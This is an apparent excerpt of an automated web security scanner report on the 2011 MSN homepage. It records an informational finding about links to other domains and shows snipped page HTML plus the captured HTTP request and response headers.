...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/greys-anatomy-sneak-peek-were-parents/5gxh0sd?q=greys+anatomy&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007">Sneak peek at the new episode of 'Grey's Anatomy'</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/hallway-golf-with-samuel-l-jackson-part-2/17wcptwcv?q=Samuel+L+Jackson&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Samuel L. Jackson gets censored during hallway golf</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/cockroaches-everywhere/p3i8frr?q=Infestation&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42007">Homeowner battles massive roach infestation</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/quitting-coffee/1d4n9ne75?q=nutrition%20&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=31036">How to conquer your caffeine cravings</a>
...[SNIP]...
<a href="http://glo.msn.com/living/celebrity-homes-131-6431.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/80/6348B864B93059586D42D2B3488810.jpg" title="Image: Ellen Pompeo's bedroom (.. Tim Street-Porter)" width="303" height="117" alt="Image: Ellen Pompeo's bedroom (.. Tim Street-Porter)" /></a>
...[SNIP]...
<a href="http://glo.msn.com/living/so-bad-its-good-6425.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/72/ABCFE1C4F5C66056C172E33024E30.jpg" title="Image: Lip plumper system (Courtesy of Cynthia Rowland Beauty Systems)" width="128" height="73" alt="Image: Lip plumper system (Courtesy of Cynthia Rowland Beauty Systems)" /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/shopping/search?q=espadrilles&amp;p1=%5bCommerceService%20scenario%3d%22f%22%20a%3d%22ra%22%5d&amp;form=msnhed&amp;gt1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/29/9FFDBD4CD35A5374A5C4F536CA4224.jpg" title="Image: Woman wearing espadrilles (.. Micaela Rossato/Getty Images)" width="128" height="73" alt="Image: Woman wearing espadrilles (.. Micaela Rossato/Getty Images)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/shopping/search?q=espadrilles&amp;p1=%5bCommerceService%20scenario%3d%22f%22%20a%3d%22ra%22%5d&amp;form=msnhed&amp;gt1=36010"><strong>
...[SNIP]...
<p>Find the <a href="http://www.bing.com/shopping/search?q=espadrilles&amp;p1=%5bCommerceService%20scenario%3d%22f%22%20a%3d%22ra%22%5d&amp;form=msnhed&amp;gt1=36010">perfect pair </a>
...[SNIP]...
<a href="http://movies.msn.com/?gt1=28101"><img class="portrait" src="http://col.stb.s-msn.com/i/94/47CA20CEC1D83ED463CFCCA12.jpg" title="Image: Natalie Portman in 'Black Swan' (Courtesy of MSN Movies)" width="116" height="175" alt="Image: Natalie Portman in 'Black Swan' (Courtesy of MSN Movies)" /></a>
...[SNIP]...
<a href="http://editorial.autos.msn.com/slideshow.aspx?cp-documentid=1166546&amp;icid=autos_0279&amp;GT1=22013"><img class="landscape" src="http://col.stb.s-msn.com/i/E3/3BC1FCA932E81C2478E0D7FBD815CE.jpg" title="Image: Ford Super Duty (.. Ford Motor Company)" width="303" height="117" alt="Image: Ford Super Duty (.. Ford Motor Company)" /></a>
...[SNIP]...
<a href="http://editorial.autos.msn.com/listarticle.aspx?cp-documentid=1166543&amp;icid=autos_0280&amp;GT1=22013"><img class="landscape" src="http://col.stb.s-msn.com/i/96/9BB51AF446252CDE6DAAFDE4CBEE8.jpg" title="Image: Land Rover Range Rover (.. Land Rover) " width="128" height="73" alt="Image: Land Rover Range Rover (.. Land Rover) " /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/21134540/vp/41385225#41385225?from=en-us_msnhp&amp;gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/6A/5D2AF371435D7E489F737AD025A121.jpg" title="Image: Video still of man on sandbar in Biscayne Bay, Fla. (Courtesy of 'Today') " width="303" height="117" alt="Image: Video still of man on sandbar in Biscayne Bay, Fla. (Courtesy of 'Today') " /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41376150/ns/technology_and_science-wireless/?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/A3/9E77B7C32B8B6567A417C23AEF86B.jpg" title="Image: Newly erected cell phone tower in Long Island, N.Y. (Courtesy of MSNBC) " width="128" height="73" alt="Image: Newly erected cell phone tower in Long Island, N.Y. (Courtesy of MSNBC) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/news/search?q=marijuana+soda&amp;&amp;FORM=msnhed&amp;gt1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/17/BA917D7658C57B9F298A9740A56B3D.jpg" title="Image: Bottles of Canna Cola (Courtesy of Canna Cola) " width="128" height="73" alt="Image: Bottles of Canna Cola (Courtesy of Canna Cola) " /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/news/search?q=marijuana+soda&amp;&amp;FORM=msnhed&amp;gt1=36010"><strong>
...[SNIP]...
<p>Bing: A California man is bottling <a href="http://www.bing.com/news/search?q=marijuana+soda&amp;&amp;FORM=msnhed&amp;gt1=36010">pot-infused sodas</a>
...[SNIP]...
<a href="http://movies.msn.com/the-rundown/"><img class="landscape" src="http://col.stb.s-msn.com/i/BE/D5E80156099DA1FE2FB6B763F473C.jpg" title="Image: Paul Rudd in 'My Idiot Brother' (.. Big Beach Films)" width="128" height="73" alt="Image: Paul Rudd in 'My Idiot Brother' (.. Big Beach Films)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=joseph+gordon-levitt+dark+knight+rises&amp;go=&amp;form=msnhed&amp;GT1=36010">Bing: Joseph Gordon-Levitt in new Batman film?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=cameron+diaz+colin+firth&amp;form=msnhed&amp;gt1=36010">Bing: Cameron Diaz joins Colin Firth for 'Gambit'</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=stephen+king%27s+the+stand+big+screen&amp;form=msnpop">Bing: Stephen King opus headed to the big screen</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k?from=en-us_msnhp">Watch an exclusive clip from 'The Roommate'</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://msn.careerbuilder.com/Article/MSN-2489-Leadership-Management-Working-on-mobile-devices-during-non-work-hours-The-new-overtime/?SiteId=cbmsnjm42489&amp;sc_extcmp=JS_2489_jobmod"><img class="landscape" src="http://col.stb.s-msn.com/i/D1/999FAA5F2B64679890584FF7841D3.jpg" title="Image: Businessman using a PDA (.. Ron Levine/Getty Images)" width="128" height="73" alt="Image: Businessman using a PDA (.. Ron Levine/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://msn.careerbuilder.com/Article/MSN-2489-Leadership-Management-Working-on-mobile-devices-during-non-work-hours-The-new-overtime/?SiteId=cbmsnjm42489&amp;sc_extcmp=JS_2489_jobmod"><strong>
...[SNIP]...
<p>How phones make work <a href="http://msn.careerbuilder.com/Article/MSN-2489-Leadership-Management-Working-on-mobile-devices-during-non-work-hours-The-new-overtime/?SiteId=cbmsnjm42489&amp;sc_extcmp=JS_2489_jobmod">more than a full-time job</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-673-Workplace-Issues-Can-Your-Job-Kill-You/?SiteId=cbmsnjm4673&amp;sc_extcmp=JS_673_jobmod">Can your job kill you?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2483-Interviewing-What-not-to-wear-to-a-job-interview/?SiteId=cbmsnjm42483&amp;sc_extcmp=JS_2483_jobmod">What not to wear to a job interview</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1268-Workplace-Issues-10-Worst-Things-to-Say-at-Work/?SiteId=cbmsnjm42083&amp;sc_extcmp=JS_1268_jobmod">10 worst things to say at work</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1854-Cover-Letters-Resumes-Honesty-is-the-Best-Policy-in-R..sum..s-and-Interviews/?SiteId=cbmsnjm41854&amp;sc_extcmp=JS_1854_jobmod">Honesty is the best policy in job hunt</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2485-Workplace-Issues-Pros-and-cons-of-working-for-your-familys-business/?SiteId=cbmsnjm42485&amp;sc_extcmp=JS_2485_jobmod">Working for your family's business</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/79/3A843E94915FDFD23A7E8EE3B4EC57.jpg" title="Image: Vietnamese soldier in tunnel holding hatch, Cu Chi Tunnels, outside Saigon, Vietnam (.. Steve Raymer/Corbis)" width="128" height="73" alt="Image: Vietnamese soldier in tunnel holding hatch, Cu Chi Tunnels, outside Saigon, Vietnam (.. Steve Raymer/Corbis)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON"><strong>
...[SNIP]...
<p>Subterranean fun, from <a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON">old bunkers</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=San+Francisco's+Chinatown+Feeds+the+Senses&amp;cid=msntab1176852&amp;form=TRVCON">Get a real taste of San Francisco's Chinatown</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&amp;cid=msntab1138076&amp;form=TRVCON">15 of the world's cheapest travel destinations</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Unusual+Beaches%3a+Boulders+Beach%2c+Cape+Peninsula%2c+South+Africa&amp;cid=msn1176225&amp;FORM=TRVCON">Strange &amp; breathtaking beaches around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Resolution%3a+Learn+a+new+sport&amp;cid=msntab1175092&amp;form=TRVCON">Turn your New Year's resolution into a vacation</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643?qpvt=orlando+hotels&amp;q=orlando+hotels&amp;cid=msn_tab&amp;form=trvcon">Orlando hotel deals</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do?cid=msn_tab&amp;form=trvcon">Cheap flights to Las Vegas</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon">Begin your hotel search with Bing</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&amp;form=trvcon">Find great deals for your 2011 travels</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Discover a new destination</a>
...[SNIP]...
<a href="http://momshomeroom.msn.com/?topicId=T4&amp;section=articles&amp;dataId=1219641&amp;source=msn&amp;gt1=25051"><img src="http://col.stb.s-msn.com/i/78/8A5D4329C8B9D9E5CAD9F927957FB.jpg" title="Image: Boy looking guilty (.. A. Chederros/Getty Images)" width="75" height="128" alt="Image: Boy looking guilty (.. A. Chederros/Getty Images)" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

18.125. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=W:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.msn.com/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher; expac=813II6a37_1229:C~126II4a36_0830:WP10_4~271II8B37_0107:C|; SVWCUK200=406199_1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 45037
Content-Length: 45037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+4&amp;mkt=en-us&amp;FORM=MSNHPT">Friday, February 4, 2011</a>
...[SNIP]...
<a href="http://money.msn.com/home-loans/rich-famous-and-in-foreclosure-bankrate.aspx?GT1=33032"><img src="http://col.stb.s-msn.com/i/9E/486AF2C139F1E3C126FCF229CD8A0.jpg" title="Image: Nicolas Cage (.. Carlo Allegri/AP)" width="303" height="211" alt="Image: Nicolas Cage (.. Carlo Allegri/AP)" /></a>
...[SNIP]...
<a href="http://specials.msn.com/A-List/Lifestyle/Super-Bowl-Sunday-fun-facts.aspx?cp-documentid=27521922&amp;imageindex=1&amp;gt1=36010"><img src="http://col.stb.s-msn.com/i/3D/AF616166918EB1DA82EC7539E8BC5.jpg" title="Image: Fergie &amp; apl.de.ap of the Black Eyed Peas (.. Kevin Mazur/WireImage)" width="303" height="211" alt="Image: Fergie &amp; apl.de.ap of the Black Eyed Peas (.. Kevin Mazur/WireImage)" /></a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Complete Super Bowl XLV coverage</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Super+Bowl+trivia&amp;go=&amp;form=msnhed&amp;gt1=36010">Bing: Super Bowl trivia </a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx?cp-documentid=27521994&amp;gt1=32093"><img src="http://col.stb.s-msn.com/i/DF/4C677288A4DB9F5A89859C2657CAAD.jpg" title="Image: Family portrait (.. Michael Hitoshi/Getty Images)" width="303" height="211" alt="Image: Family portrait (.. Michael Hitoshi/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-life/big-on-the-web/?v=25643d67-a1a9-9add-af95-f375c9dd0f2f&amp;q=nerve%20worst%20best%20halftime&amp;from=en-us_msnhp&amp;gt1=32095"><img src="http://col.stb.s-msn.com/i/7D/94FA4523880FEC6319112EA5FE22A.jpg" title="Image: (From left) Wynonna &amp; Naomi Judd perform at half-time of Super Bowl XXVIII (.. Messerschmidt/Getty Images)" width="303" height="211" alt="Image: (From left) Wynonna &amp; Naomi Judd perform at half-time of Super Bowl XXVIII (.. Messerschmidt/Getty Images)" /></a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Get complete coverage of Super Bowl XLV</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/videos/watch/video/first-look-dell-streak-7-tablet/q9yozndg?q=Tablet+Computer&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007">Video: Dell Streak 7 to be first-ever 4G tablet</a>
...[SNIP]...
<a href="http://specials.msn.com/A-List/Local/Feb-4-Weekend-Events.aspx?cp-documentid=27505956&amp;gt1=24000"><img src="http://col.stb.s-msn.com/i/65/FD8E942BCB8AEB20FC6714D1568CB1.jpg" title="Image: Vancouver's New Year parade (.. Kim Ludbrook/epa/Corbis)" width="303" height="211" alt="Image: Vancouver's New Year parade (.. Kim Ludbrook/epa/Corbis)" /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/events/search?q=events&amp;form=MSNLEC&amp;gt1=24000">Find weekend events near you </a>
...[SNIP]...
<li class="media"><a href="http://msn.foxsports.com/video/NHL?vid=a9114f31-9ff2-4aef-992c-c74427ae8ae8&amp;from=en-us_msnhp&amp;gt1=39002">Hockey: 3 fights in 4 seconds</a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41423215/ns/business-stocks_and_economy"><img class="landscape" src="http://col.stb.s-msn.com/i/E8/935662D79C90E6A58C84571D67BA.jpg" title="" width="303" height="117" alt="A career center specialist helps job seeker Paula Morgan, of Beaverton, Ore., who has been unemployed the last nine months (AP)" /></a>
...[SNIP]...
<li class="ter"><a href="http://redtape.msnbc.com/2011/02/once-you-look-its-hard-to-look-away-the-tweets-seem-to-come-right-from-the-center-of-the-conflict-in-egypt-despite-the-bl.html">On Twitter, Egypt crisis..is riveting</a>
...[SNIP]...
<a href="http://money.msn.com/saving-money/22-ways-to-fight-rising-food-prices-investopedia.aspx?GT1=33026"><img class="landscape" src="http://col.stb.s-msn.com/i/65/1464149D2DE267FEA5F02CF549D6.jpg" title="Image: Woman looking at grocery list (.. Paul Burns/Photodisc/Getty Images) " width="303" height="117" alt="Image: Woman looking at grocery list (.. Paul Burns/Photodisc/Getty Images) " /></a>
...[SNIP]...
<span class="piped"> | <a href="http://www.bing.com/search?q=hummer+h2+2011&amp;form=msnhed?GT1=36010">Bing: Hummer H2</a>
...[SNIP]...
<a href="http://health.msn.com/health-topics/menopause/articlepage.aspx?cp-documentid=100269289&amp;gt1=31015"><img class="landscape" src="http://col.stb.s-msn.com/i/49/4EA25A6CA4DE961DA337C5F4CD28.jpg" title="Image: Woman adjusting scale at health club (.. Getty Images)" width="303" height="117" alt="Image: Woman adjusting scale at health club (.. Getty Images) " /></a>
...[SNIP]...
<a href="http://fitbie.msn.com/get-fitter/tips/4-snowy-day-treadmill-tricks?gt1=50007"><img class="landscape" src="http://col.stb.s-msn.com/i/61/6DF12BEE879485E55CC172BF29E70.jpg" title="Image: Woman jogging on treadmill (.. Chris Clinton/Getty Images) " width="128" height="73" alt="Image: Woman jogging on treadmill (.. Chris Clinton/Getty Images) " /></a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/jillian-s-lean-mean-leg-workout/athwosa8?q=fitness+legs&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=31036">Video: Jillian Michaels' lean &amp; mean leg workout</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/the-best-super-bowl-snacks/1l0jll587?q=skin+care&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=50002">Video: The smartest snacks for Super Bowl Sunday</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://msn.foxsports.com/nfl/story/super-bowl-xlv-green-bay-packers-pittsburgh-steelers-schein-boom-or-bust-020411"><img class="portrait" src="http://static.foxsports.com/content/fscom/img/2011/02/04/020411-NFL-James-Starks-JW_20110204113956438_116_175.JPG" width="116" height="175" alt="Image: James Starks of the Green Bay Packers (David J. Phillip/AP Images)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://msn.foxsports.com/nfl/story/super-bowl-xlv-green-bay-packers-pittsburgh-steelers-schein-boom-or-bust-020411">Will big stars shine or choke in Super Bowl?</a>
...[SNIP]...
<li class="ter media"><a href="http://msn.foxsports.com/video/NFL?vid=c6cb9767-8438-442f-a105-29c3271330d3&amp;from=en-us_msnhp">Ex-champs dish on Super Bowl</a><span class="piped"> | <a href="http://msn.foxsports.com/nfl/story/Jason-Whitlock-Super-Bowl-XLV-chat-020411">Live Whitlock chat</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/New-York-Yankees-Andy-Pettitte-says-goodbye-to-baseball-020411">Yankee great: 'My heart's not where it needs to be'</a>
...[SNIP]...
<li class="ter"><a href="http://www.whatifsports.com/beyondtheboxscore/default.asp?article=2010NFL_PackersSteelersSuperBowl">Super Bowl simulation: Who will win?</a>
...[SNIP]...
<span class="media"><a href="http://msn.foxsports.com/video/?vid=96261de8-3ed6-4b4d-94fd-8bab7e1a2746&amp;from=en-us_msnhp">Preview</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Father-of-Green-Bay-Packers-Cullen-Jenkins-is-safe-in-Hawaii-020311">Police: Father of Green Bay Packer found safe</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/Former-New-York-Yankee-Jim-Leyritz-coaching-in-minor-leagues-020411">Embattled former Yankee back in baseball</a>
...[SNIP]...
<li class="ter media"><a href="http://msn.foxsports.com/video/NHL?vid=a9114f31-9ff2-4aef-992c-c74427ae8ae8&amp;from=en-us_msnhp">NHL teams fight 3 times in 4 seconds</a><span class="piped"> | <a href="http://www.foxsportssouthwest.com/msn/02/03/11/Stars-bullied-by-Bruins/landing_stars.html?blockID=403786&amp;feedID=4519">'Bad blood'</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/2/1045421.html">Big losers: Who stumbled on college Signing Day?</a>
...[SNIP]...
<a href="http://realestate.msn.com/article.aspx?cp-documentid=26853820&amp;GT1=35006"><img class="portrait" src="http://col.stb.s-msn.com/i/32/B55C2C751B808AC07EDE6F44ADE2.jpg" title=" Image: 'For rent' sign on fence (.. David Joel/Getty Images)" width="116" height="175" alt=" Image: 'For rent' sign on fence (.. David Joel/Getty Images)" /></a>
...[SNIP]...
<a href="http://realestate.msn.com//slideshow.aspx?cp-documentid=26785158&amp;GT1=35009"><img class="landscape" src="http://col.stb.s-msn.com/i/CB/16C1E74CA913F646783543CF2BA5F2.jpg" title="Image: Aluminum frame carport (.. Sankyo Tateyama Aluminum Inc.)" width="128" height="73" alt="Image: Aluminum frame carport (.. Sankyo Tateyama Aluminum Inc.)" /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41390382/ns/technology_and_science-science/?GT1=43001"><img class="portrait" src="http://col.stb.s-msn.com/i/9E/DDA1AA42D9147F8EC6AD7FD5A55B1.jpg" title="Image: Woman taking notes at meeting (.. Helen King/Corbis)" width="116" height="175" alt="Image: Woman taking notes at meeting (.. Helen King/Corbis)" /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41391019/ns/technology_and_science-science/from/toolbar?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/96/E27E2FBE23592C0BA7CA297D5C3.jpg" title="Image: Red-headed Gouldian finch (Courtesy of iStockphoto)" width="128" height="73" alt="Image: Image from the expertvillage YouTube video on how to apply foundation for men (Courtesy of MSNBC)" /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/tortoise-equipped-with-wheels/ufn3i4x2?q=Tortoise+Turtle&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/E5/875F8AB3C2DDABA461E7538668033.jpg" title=" Image: Video still of Zvika the tortoise (.. U-Zoo) " width="128" height="73" alt="Image: Video still of Zvika the tortoise (.. U-Zoo)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/tortoise-equipped-with-wheels/ufn3i4x2?q=Tortoise+Turtle&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007"><strong>
...[SNIP]...
<p>Video: Zvika was run over by a lawn mower, but thanks to an inventive vet <a href="http://www.bing.com/videos/watch/video/tortoise-equipped-with-wheels/ufn3i4x2?q=Tortoise+Turtle&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007">he's still going</a>
...[SNIP]...
<a href="http://movies.msn.com/academy-awards/james-franco-file/"><img class="landscape" src="http://col.stb.s-msn.com/i/3D/AA3DAC97D8BFF73F7D7B8873CA67A.jpg" title="Image: James Franco (.. AP)" width="128" height="73" alt="Image: James Franco (.. AP)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=joseph+gordon-levitt+dark+knight+rises&amp;go=&amp;form=msnhed&amp;GT1=36010">Bing: Joseph Gordon-Levitt in new Batman film?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=cameron+diaz+colin+firth&amp;form=msnhed&amp;gt1=36010">Bing: Cameron Diaz joins Colin Firth for 'Gambit'</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=stephen+king%27s+the+stand+big+screen&amp;form=msnpop">Bing: Stephen King opus headed to the big screen</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://msn.careerbuilder.com/Article/MSN-2490-Job-Info-and-Trends-10-things-the-CIA-can-teach-you-about-your-own-career/?SiteId=cbmsnjm42490&amp;sc_extcmp=JS_2490_jobmod"><img class="landscape" src="http://col.stb.s-msn.com/i/BB/5EF8F597EFF8558D3C29F2A52AE343.jpg" title="Image: Computer file marked 'Top Secret' (.. Medioimages/Photodisc/Getty Images)" width="128" height="73" alt="Image: Computer file marked 'Top Secret' (.. Medioimages/Photodisc/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://msn.careerbuilder.com/Article/MSN-2490-Job-Info-and-Trends-10-things-the-CIA-can-teach-you-about-your-own-career/?SiteId=cbmsnjm42490&amp;sc_extcmp=JS_2490_jobmod"><strong>
...[SNIP]...
<p>Tips that <a href="http://msn.careerbuilder.com/Article/MSN-2490-Job-Info-and-Trends-10-things-the-CIA-can-teach-you-about-your-own-career/?SiteId=cbmsnjm42490&amp;sc_extcmp=JS_2490_jobmod">help make things work</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2206-Career-Growth-and-Change-Are-You-Getting-Bad-Job-Advice/?SiteId=cbmsnjm42206&amp;sc_extcmp=JS_2206_jobmod">Are you getting bad job advice?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/JobSeeker/MyCB.aspx?siteid=cbmsnjm">Set up an alert for new job postings</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2489-Leadership-Management-Working-on-mobile-devices-during-non-work-hours-The-new-overtime/?SiteId=cbmsnjm42489&amp;sc_extcmp=JS_2489_jobmod">Is your mobile device the new 'overtime'?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-673-Workplace-Issues-Can-Your-Job-Kill-You/?SiteId=cbmsnjm4673&amp;sc_extcmp=JS_673_jobmod">Can your job kill you?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2483-Interviewing-What-not-to-wear-to-a-job-interview/?SiteId=cbmsnjm42483&amp;sc_extcmp=JS_2483_jobmod">What not to wear to a job interview</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
